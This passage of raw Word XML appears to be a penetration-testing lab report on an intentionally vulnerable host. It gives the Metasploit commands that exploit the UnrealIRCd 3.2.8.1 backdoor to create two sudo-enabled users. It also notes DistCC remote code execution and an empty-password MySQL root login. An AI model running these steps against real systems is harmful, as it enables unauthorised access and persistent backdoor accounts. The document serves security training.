      <w:r w:rsidR="00ED1437">
        <w:t>login “password”</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7CCE9354" w14:textId="3B39E4FB" w:rsidR="00E53903" w:rsidRDefault="00E53903" w:rsidP="00ED1437">
      <w:r>
        <w:t>Which was tested.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D732A83" w14:textId="1632A0A9" w:rsidR="00E53903" w:rsidRDefault="00E53903" w:rsidP="00ED1437">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="2F4A284C" wp14:editId="4AF8A83A">
            <wp:extent cx="5292852" cy="3361944"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="1248" name="Picture 1248" descr="A computer screen with a white square on it&#10;&#10;Description automatically generated"/>
            <wp:cNvGraphicFramePr/>
            <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
                  <pic:nvPicPr>
                    <pic:cNvPr id="1248" name="Picture 1248" descr="A computer screen with a white square on it&#10;&#10;Description automatically generated"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId84"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5292852" cy="3361944"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="23B1789E" w14:textId="77777777" w:rsidR="00620BAC" w:rsidRDefault="00620BAC" w:rsidP="00620BAC"/>
    <w:p w14:paraId="15A97DF0" w14:textId="4D4951FE" w:rsidR="00620BAC" w:rsidRDefault="009664C3" w:rsidP="001563F3">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:bookmarkStart w:id="31" w:name="_Toc155092380"/>
      <w:r>
        <w:t xml:space="preserve">Port </w:t>
      </w:r>
      <w:r w:rsidR="0005303B">
        <w:t xml:space="preserve">6667, </w:t>
      </w:r>
      <w:r w:rsidR="00620BAC">
        <w:t>BackDoor v3.2.8.1</w:t>
      </w:r>
      <w:bookmarkEnd w:id="31"/>
      <w:r w:rsidR="00620BAC">
        <w:t xml:space="preserve">   </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="70775741" w14:textId="77777777" w:rsidR="00620BAC" w:rsidRDefault="00620BAC" w:rsidP="00620BAC">
      <w:r>
        <w:t xml:space="preserve">Going to use the backdoor to create two users. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="65CA6867" w14:textId="77777777" w:rsidR="00620BAC" w:rsidRDefault="00620BAC" w:rsidP="00620BAC">
      <w:r>
        <w:t xml:space="preserve">use exploit/unix/irc/unreal_ircd_3281_backdoor  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6ACB46F9" w14:textId="66F52647" w:rsidR="00BF414F" w:rsidRDefault="00620BAC" w:rsidP="00620BAC">
      <w:r>
        <w:t xml:space="preserve">show options   </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4397C580" w14:textId="48FC761A" w:rsidR="003C24C7" w:rsidRDefault="003C24C7" w:rsidP="00620BAC">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="4F56BDFC" wp14:editId="576B432A">
            <wp:extent cx="5736590" cy="2353310"/>
            <wp:effectExtent l="0" t="0" r="0" b="8890"/>
            <wp:docPr id="20889517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6590" cy="2353310"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="29565A40" w14:textId="77777777" w:rsidR="003C24C7" w:rsidRDefault="003C24C7" w:rsidP="00620BAC"/>
    <w:p w14:paraId="0F9D1963" w14:textId="77777777" w:rsidR="007F7E46" w:rsidRDefault="007F7E46" w:rsidP="007F7E46">
      <w:r>
        <w:t xml:space="preserve">set CHOST 192.168.254.182 </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F5EE56D" w14:textId="77777777" w:rsidR="007F7E46" w:rsidRDefault="007F7E46" w:rsidP="007F7E46">
      <w:r>
        <w:t xml:space="preserve">set CPORT 4444 </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="61058C2A" w14:textId="77777777" w:rsidR="00594B23" w:rsidRDefault="007F7E46" w:rsidP="007F7E46">
      <w:r>
        <w:t xml:space="preserve">set RHOSTS 192.168.254.186  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="026F5730" w14:textId="25664F86" w:rsidR="00BF414F" w:rsidRDefault="007F7E46" w:rsidP="007F7E46">
      <w:r>
        <w:t xml:space="preserve">show options   </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="397783EF" w14:textId="390D35D3" w:rsidR="00594B23" w:rsidRDefault="00594B23" w:rsidP="007F7E46">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="4AD6BCDD" wp14:editId="553EA7D6">
            <wp:extent cx="5731510" cy="2838782"/>
            <wp:effectExtent l="0" t="0" r="2540" b="0"/>
            <wp:docPr id="1296" name="Picture 1296"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6" name="Picture 1296" descr="A screenshot of a computer&#10;&#10;Description automatically generated"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId86"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5731510" cy="2838782"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="776E63E0" w14:textId="37C1EA9B" w:rsidR="00D20B66" w:rsidRDefault="00594B23" w:rsidP="007F7E46">
      <w:r>
        <w:t xml:space="preserve">show advanced </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="23F9EB1F" w14:textId="1EA9E978" w:rsidR="00594B23" w:rsidRDefault="00D20B66" w:rsidP="007F7E46">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="07EA419F" wp14:editId="44DE3669">
            <wp:extent cx="5736590" cy="2261870"/>
            <wp:effectExtent l="0" t="0" r="0" b="5080"/>
            <wp:docPr id="4306001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590" cy="2261870"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="4437CD07" w14:textId="77777777" w:rsidR="00EF6A43" w:rsidRDefault="00EF6A43" w:rsidP="007F7E46">
      <w:r w:rsidRPr="00EF6A43">
        <w:t xml:space="preserve">Lets see what payloads we can use? </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A0E7721" w14:textId="0A7BA363" w:rsidR="00D20B66" w:rsidRDefault="00EF6A43" w:rsidP="007F7E46">
      <w:r w:rsidRPr="00EF6A43">
        <w:t xml:space="preserve">show payloads   </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3632903B" w14:textId="7A73963F" w:rsidR="00EF6A43" w:rsidRDefault="00F85A44" w:rsidP="007F7E46">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="3BFAC08C" wp14:editId="6EBA419A">
            <wp:extent cx="5736590" cy="1725295"/>
            <wp:effectExtent l="0" t="0" r="0" b="8255"/>
            <wp:docPr id="1745677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6590" cy="1725295"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="02F24AD5" w14:textId="77777777" w:rsidR="00E40502" w:rsidRDefault="00E40502" w:rsidP="00E40502">
      <w:r>
        <w:t xml:space="preserve">PAYLOAD 0   </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="590EE242" w14:textId="77777777" w:rsidR="00E40502" w:rsidRDefault="00E40502" w:rsidP="00E40502">
      <w:r>
        <w:t xml:space="preserve">show options </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="290F330A" w14:textId="481E9A36" w:rsidR="00F85A44" w:rsidRDefault="00E40502" w:rsidP="00E40502">
      <w:r>
        <w:t xml:space="preserve">Just to make sure its set   </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6DAA1284" w14:textId="38DDB9D8" w:rsidR="00E05828" w:rsidRDefault="00E05828" w:rsidP="00E40502">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="694473E2" wp14:editId="7870E526">
            <wp:extent cx="5736590" cy="3023870"/>
            <wp:effectExtent l="0" t="0" r="0" b="5080"/>
            <wp:docPr id="9855883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6590" cy="3023870"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="60A3069A" w14:textId="391A45FF" w:rsidR="00A0433A" w:rsidRDefault="00A0433A" w:rsidP="00E40502">
      <w:r w:rsidRPr="00A0433A">
        <w:t>It will a</w:t>
      </w:r>
      <w:r>
        <w:t>t</w:t>
      </w:r>
      <w:r w:rsidRPr="00A0433A">
        <w:t>tempt to create a user Metasplo</w:t>
      </w:r>
      <w:r>
        <w:t>it</w:t>
      </w:r>
      <w:r w:rsidRPr="00A0433A">
        <w:t xml:space="preserve"> and its password </w:t>
      </w:r>
      <w:r>
        <w:t>it should also update the sudo file.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0CE65F61" w14:textId="0DED38A7" w:rsidR="00E05828" w:rsidRDefault="00A0433A" w:rsidP="00E40502">
      <w:r w:rsidRPr="00A0433A">
        <w:t xml:space="preserve">show advanced   </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C9DB7E6" w14:textId="74342915" w:rsidR="006D5BFF" w:rsidRDefault="00A94847" w:rsidP="006D5BFF">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="6EDFD73C" wp14:editId="220BB5B7">
            <wp:extent cx="5529580" cy="6565900"/>
            <wp:effectExtent l="0" t="0" r="0" b="6350"/>
            <wp:docPr id="8322004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29580" cy="6565900"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
      <w:r w:rsidR="006D5BFF">
        <w:t xml:space="preserve">   </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="09A8C969" w14:textId="444C306B" w:rsidR="00856C90" w:rsidRDefault="00856C90" w:rsidP="006D5BFF">
      <w:r>
        <w:t>run</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="13A7F077" w14:textId="2B391ECC" w:rsidR="00856C90" w:rsidRDefault="00856C90" w:rsidP="006D5BFF">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="718C9663" wp14:editId="5886174F">
            <wp:extent cx="5949950" cy="1017905"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="17635892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9950" cy="1017905"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="6FCBB8B0" w14:textId="39A4C46A" w:rsidR="006D5BFF" w:rsidRDefault="006D5BFF" w:rsidP="006D5BFF">
      <w:r>
        <w:t xml:space="preserve">Lest check the target for the user   </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="296B7A07" w14:textId="7A0DAFE9" w:rsidR="006D5BFF" w:rsidRDefault="00D01E10" w:rsidP="006D5BFF">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="1E6B0ACE" wp14:editId="6E9C3798">
            <wp:extent cx="5730875" cy="359410"/>
            <wp:effectExtent l="0" t="0" r="3175" b="2540"/>
            <wp:docPr id="8706585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875" cy="359410"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="6CE42841" w14:textId="77777777" w:rsidR="00856C90" w:rsidRDefault="00856C90" w:rsidP="006D5BFF"/>
    <w:p w14:paraId="17795F18" w14:textId="31D851EE" w:rsidR="00856C90" w:rsidRDefault="005725A9" w:rsidP="006D5BFF">
      <w:r>
        <w:t>Setup one more user</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="17CFC4C1" w14:textId="112968B8" w:rsidR="00D01E10" w:rsidRDefault="005725A9" w:rsidP="006D5BFF">
      <w:r w:rsidRPr="005725A9">
        <w:t xml:space="preserve">set USER harrybrown   </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="38DF43D3" w14:textId="4E51ECC5" w:rsidR="005F4C76" w:rsidRDefault="005F4C76" w:rsidP="006D5BFF">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="269456D0" wp14:editId="55B84619">
            <wp:extent cx="5736590" cy="3736975"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="3587501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6590" cy="3736975"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="1BF6F30A" w14:textId="64643962" w:rsidR="00BF414F" w:rsidRDefault="0088687B" w:rsidP="0088687B">
      <w:r w:rsidRPr="0088687B">
        <w:t xml:space="preserve">Let’s check the target   </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F65EAC2" w14:textId="3A80AC8D" w:rsidR="0088687B" w:rsidRDefault="00AB69C6" w:rsidP="0088687B">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="439FBC8D" wp14:editId="5FF44ED2">
            <wp:extent cx="5736590" cy="2700655"/>
            <wp:effectExtent l="0" t="0" r="0" b="4445"/>
            <wp:docPr id="16649925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6590" cy="2700655"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="40D25355" w14:textId="1030EF76" w:rsidR="00AB69C6" w:rsidRDefault="001124F8" w:rsidP="0088687B">
      <w:r w:rsidRPr="001124F8">
        <w:t xml:space="preserve">And there it is (the last one)   </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="21B629D0" w14:textId="77777777" w:rsidR="008F653F" w:rsidRDefault="008F653F" w:rsidP="0088687B"/>
    <w:p w14:paraId="0A7A2D41" w14:textId="77777777" w:rsidR="008F653F" w:rsidRDefault="008F653F" w:rsidP="0088687B"/>
    <w:p w14:paraId="472F2583" w14:textId="77777777" w:rsidR="008F653F" w:rsidRDefault="008F653F" w:rsidP="0088687B"/>
    <w:p w14:paraId="7E22781E" w14:textId="0C26CA64" w:rsidR="001124F8" w:rsidRDefault="008F653F" w:rsidP="0088687B">
      <w:r w:rsidRPr="008F653F">
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">Let’s see if the users were given any permissions.   </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E817A78" w14:textId="344FA8AF" w:rsidR="00BF2140" w:rsidRDefault="00BF2140" w:rsidP="0088687B">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="5D52B4D6" wp14:editId="39E8D567">
            <wp:extent cx="5736590" cy="3261360"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="635564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6590" cy="3261360"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="1FF65B46" w14:textId="25B5651F" w:rsidR="00833738" w:rsidRDefault="0080197A" w:rsidP="00833738">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:bookmarkStart w:id="32" w:name="_Toc155092381"/>
      <w:r>
        <w:t xml:space="preserve">Port 6697 </w:t>
      </w:r>
      <w:r w:rsidR="00833738" w:rsidRPr="00833738">
        <w:t>NVT: UnrealIRCd Authentication Spoong Vulnerability</w:t>
      </w:r>
      <w:bookmarkEnd w:id="32"/>
    </w:p>
    <w:p w14:paraId="45317291" w14:textId="289AF359" w:rsidR="00F561E8" w:rsidRDefault="00511F27" w:rsidP="00F05F95">
      <w:r w:rsidRPr="00511F27">
        <w:t>UnrealIRCd is prone to authentication spoo</w:t>
      </w:r>
      <w:r w:rsidR="007C077A">
        <w:t>i</w:t>
      </w:r>
      <w:r w:rsidRPr="00511F27">
        <w:t>ng vulnerability.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="017BCA22" w14:textId="2E563F3B" w:rsidR="00511F27" w:rsidRDefault="00511F27" w:rsidP="0080197A">
      <w:pPr>
        <w:autoSpaceDE w:val="0"/>
        <w:autoSpaceDN w:val="0"/>
        <w:adjustRightInd w:val="0"/>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="F37" w:hAnsi="F37" w:cs="F37"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="F37" w:hAnsi="F37" w:cs="F37"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Successful exploitation of this vulnerability will allows remote attackers to spoof </w:t>
      </w:r>
      <w:r w:rsidR="007C077A">
        <w:rPr>
          <w:rFonts w:ascii="F37" w:hAnsi="F37" w:cs="F37"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>certificate</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="F37" w:hAnsi="F37" w:cs="F37"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="0080197A">
        <w:rPr>
          <w:rFonts w:ascii="F37" w:hAnsi="F37" w:cs="F37"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>finger</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="F37" w:hAnsi="F37" w:cs="F37"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>prints and consequently log in as another user.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C3DCF3C" w14:textId="77777777" w:rsidR="00205FA7" w:rsidRDefault="00205FA7" w:rsidP="0080197A">
      <w:pPr>
        <w:autoSpaceDE w:val="0"/>
        <w:autoSpaceDN w:val="0"/>
        <w:adjustRightInd w:val="0"/>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="F37" w:hAnsi="F37" w:cs="F37"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7E396DD1" w14:textId="6EB6B102" w:rsidR="00205FA7" w:rsidRDefault="00205FA7" w:rsidP="00F056A1">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:bookmarkStart w:id="33" w:name="_Toc155092382"/>
      <w:r>
        <w:t>Port 3632</w:t>
      </w:r>
      <w:r w:rsidR="00501528">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00501528" w:rsidRPr="00501528">
        <w:t>DistCC RCE Vulnerability (CVE-2004-2687)</w:t>
      </w:r>
      <w:bookmarkEnd w:id="33"/>
    </w:p>
    <w:p w14:paraId="44FD2797" w14:textId="77777777" w:rsidR="00501528" w:rsidRDefault="00501528" w:rsidP="00501528">
      <w:pPr>
        <w:autoSpaceDE w:val="0"/>
        <w:autoSpaceDN w:val="0"/>
        <w:adjustRightInd w:val="0"/>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="F37" w:hAnsi="F37" w:cs="F37"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="F37" w:hAnsi="F37" w:cs="F37"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>DistCC by default trusts its clients completely that in turn could allow a malicious client to</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="41B0BC25" w14:textId="3EE4A10D" w:rsidR="00501528" w:rsidRDefault="00501528" w:rsidP="00501528">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="F37" w:hAnsi="F37" w:cs="F37"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="F37" w:hAnsi="F37" w:cs="F37"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>execute arbitrary commands on the server.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D2E44CD" w14:textId="09076B62" w:rsidR="007668BF" w:rsidRDefault="007668BF" w:rsidP="00F056A1">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:bookmarkStart w:id="34" w:name="_Toc155092383"/>
      <w:r>
        <w:t>Port 3306 MySql</w:t>
      </w:r>
      <w:bookmarkEnd w:id="34"/>
    </w:p>
    <w:p w14:paraId="4CF1B956" w14:textId="52B2C0A4" w:rsidR="00181A83" w:rsidRDefault="00181A83" w:rsidP="00181A83">
      <w:r>
        <w:t>Nmap</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="784068D5" w14:textId="77777777" w:rsidR="00181A83" w:rsidRDefault="00181A83" w:rsidP="00181A83">
      <w:r>
        <w:t>3306/tcp open  mysql       MySQL 5.0.51a-3ubuntu5</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A02ABDD" w14:textId="77777777" w:rsidR="00181A83" w:rsidRDefault="00181A83" w:rsidP="00181A83">
      <w:r>
        <w:t xml:space="preserve">| mysql-info: </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="33881A1F" w14:textId="77777777" w:rsidR="00181A83" w:rsidRDefault="00181A83" w:rsidP="00181A83">
      <w:r>
        <w:t>|   Protocol: 10</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="075EF321" w14:textId="77777777" w:rsidR="00181A83" w:rsidRDefault="00181A83" w:rsidP="00181A83">
      <w:r>
        <w:t>|   Version: 5.0.51a-3ubuntu5</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="60A1E0A0" w14:textId="77777777" w:rsidR="00181A83" w:rsidRDefault="00181A83" w:rsidP="00181A83">
      <w:r>
        <w:t>|   Thread ID: 20</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D333756" w14:textId="77777777" w:rsidR="00181A83" w:rsidRDefault="00181A83" w:rsidP="00181A83">
      <w:r>
        <w:t>|   Capabilities flags: 43564</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="70DEB694" w14:textId="77777777" w:rsidR="00181A83" w:rsidRDefault="00181A83" w:rsidP="00181A83">
      <w:r>
        <w:t>|   Some Capabilities: LongColumnFlag, Speaks41ProtocolNew, SupportsTransactions, Support41Auth, SwitchToSSLAfterHandshake, ConnectWithDatabase, SupportsCompression</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B0F51E4" w14:textId="77777777" w:rsidR="00181A83" w:rsidRDefault="00181A83" w:rsidP="00181A83">
      <w:r>
        <w:t>|   Status: Autocommit</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="05C550B4" w14:textId="77777777" w:rsidR="00181A83" w:rsidRDefault="00181A83" w:rsidP="00181A83">
      <w:r>
        <w:t>|_  Salt: R-+-A&gt;Q_ipx*d:45K[i~</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B32D351" w14:textId="25989FB0" w:rsidR="00231879" w:rsidRDefault="00231879" w:rsidP="00231879">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="F37" w:hAnsi="F37" w:cs="F37"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="F37" w:hAnsi="F37" w:cs="F37"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>It was possible to login into the remote MySQL as root using weak credentials.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="27DA474F" w14:textId="4FAE525C" w:rsidR="00231879" w:rsidRDefault="00F605F9" w:rsidP="00231879">
      <w:r w:rsidRPr="00F605F9">
        <w:t>It was possible to login as root with an empty password</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0069ADF4" w14:textId="77777777" w:rsidR="00AA4582" w:rsidRDefault="00AA4582" w:rsidP="00AA4582">
      <w:pPr>
        <w:autoSpaceDE w:val="0"/>
        <w:autoSpaceDN w:val="0"/>
        <w:adjustRightInd w:val="0"/>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="F53" w:hAnsi="F53" w:cs="F53"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="F53" w:hAnsi="F53" w:cs="F53"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>References</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="71430B6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CVE-2001-0645</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="341A781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CVE-2004-2357</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="767DFF9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CVE-2006-1451</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5AC43480"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CVE-2007-2554</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="341F061E"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CVE-2007-6081</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="253A6ACB"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CVE-2009-0919</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D1FA292"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CVE-2014-3419</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="51AC970D"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CVE-2015-4669</w:t>
      </w:r>
    </w:p>
